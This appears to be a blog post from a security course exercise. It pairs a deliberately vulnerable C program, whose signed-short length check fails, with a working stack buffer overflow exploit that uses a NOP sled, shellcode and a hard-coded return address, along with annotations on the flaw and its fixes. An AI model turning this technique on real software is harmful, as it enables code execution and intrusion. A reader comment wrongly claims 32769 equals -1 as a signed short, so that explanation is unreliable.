
Buffer Overflowing Target 4

target4.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Copy the string `arg` into a 4032-byte stack buffer, guarded by a length
 * check on `arglen`. Always returns 0. This is the target of the overflow
 * exercise on this page; the code is left unchanged and the flaws are
 * annotated for review.
 *
 * NOTE(review): the guard does not bound the copy, for two reasons.
 *  1. `arglen` is a signed short, but the caller in main() passes the
 *     result of strlen(), a size_t. A length that does not fit in a short
 *     is converted in an implementation-defined way; where short is 16
 *     bits, lengths of 32768 and above commonly become negative and pass
 *     `arglen < maxlen`.
 *  2. The copy length is strlen(arg), recomputed independently of the
 *     value that was checked, so the check and the copy can disagree.
 * A safe version takes the length as size_t, compares it against
 * sizeof buf, and copies exactly the length it checked.
 */
int foo(char *arg, short arglen)
{
 int maxlen = 4032;
 char buf[4032];

 /* The check uses the narrowed arglen, while the copy uses the real
  * string length. memcpy also copies no terminating NUL into buf. */
 if (arglen < maxlen)
  memcpy(buf, arg, strlen(arg));
 return 0;
}

/*
 * Entry point of the exercise target: requires exactly one command-line
 * argument, passes it to foo() together with its length, then checks a
 * hand-rolled "canary" value.
 *
 * Exits with EXIT_FAILURE when argc != 2 or when canary[0] is no longer 0
 * after foo() returns; otherwise returns 0.
 */
int main(int argc, char *argv[])
{
 /* Local array whose first element is zeroed here and inspected after the
  * call. NOTE(review): this is not a compiler-generated stack protector.
  * It lives in main's frame and is only examined once foo() has already
  * returned, so it cannot catch corruption of foo's own saved return
  * address before that return is taken. */
 int canary[10];
 canary[0] = 0;
 if (argc != 2)
 {
  fprintf(stderr, "target4: argc != 2\n");
  exit(EXIT_FAILURE);
 }

 /* strlen() yields a size_t, but foo()'s second parameter is a short, so
  * the length is implicitly narrowed at this call. Compiling with
  * -Wconversion reports this kind of narrowing. */
 foo(argv[1], strlen(argv[1]));
 if(canary[0] != 0) {
  exit(EXIT_FAILURE);
 }

 return 0;
}

sploit4.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "shellcode.h"

#define TARGET "/tmp/target4"

/*
 * Exercise driver: builds one long command-line argument in `buf` and
 * executes TARGET with it and an empty environment.
 *
 * The argument is 32768 bytes long before its terminator (assuming the
 * `shellcode` string from shellcode.h contains no NUL bytes; it is not
 * shown here). That length does not fit in a 16-bit signed short, which is
 * the weakness in the target's length check that this exercise shows.
 *
 * NOTE(review): the four hard-coded bytes at offsets 4048-4051 are specific
 * to the author's build and environment (presumably an address; confirm
 * against the original write-up). The root-cause fix is correct bounds
 * checking in the target. Compiler stack protection, non-executable stacks
 * and address-space randomisation are the standard defence-in-depth
 * mitigations for this class of bug.
 */
int main(void)
{
 char *args[3];
 char *env[1];
 char buf[32769];
 int i;

 /* Fill buf by region. 4032 is the size of the stack buffer in the
  * target's foo(); the `shellcode` bytes are placed so they end exactly at
  * that offset, with filler byte 0x90 before them. */
 for(i = 0; i<32769; i++){
  if(i<4032-strlen(shellcode))
   buf[i] = '\x90';
  else if(i<4032)
   buf[i] = shellcode[i-4032+strlen(shellcode)];
  /* 16 more filler bytes, then the four hard-coded bytes. */
  else if(i<4048)
   buf[i] ='\x90';
  else if(i<4049)
   buf[i] = '\x7c';
  else if(i<4050)
   buf[i] = '\x6e';
  else if(i<4051)
   buf[i] = '\xff';
  else if(i<4052)
   buf[i] = '\xbf';
  /* Padding up to index 32767, which fixes the total string length. */
  else if(i<32768)
   buf[i] = '\x90';
  /* The last element is the NUL terminator. */
  else
   buf[i] = '\x00';

 }

 /* argv for the target: program path plus the single argument. The
  * environment is empty. */
 args[0] = TARGET; args[1] = buf ; args[2] = NULL;
 env[0] = NULL;

 /* execve() returns only on failure. */
 if (0 > execve(TARGET, args, env))
  fprintf(stderr, "execve failed.\n");

 return 0;
}
  1. Bob
    March 28, 2011 at 9:21 pm

    Is there any specific reason you use a buffer of size 32769? Or could you have just used a random number larger than 4052?

    • Ritu
      April 13, 2011 at 12:27 am

      32769 = -1 for signed short, following condition holds in foo and memcpy overwrites

      if (arglen < maxlen)
      memcpy(buf, arg, strlen(arg));
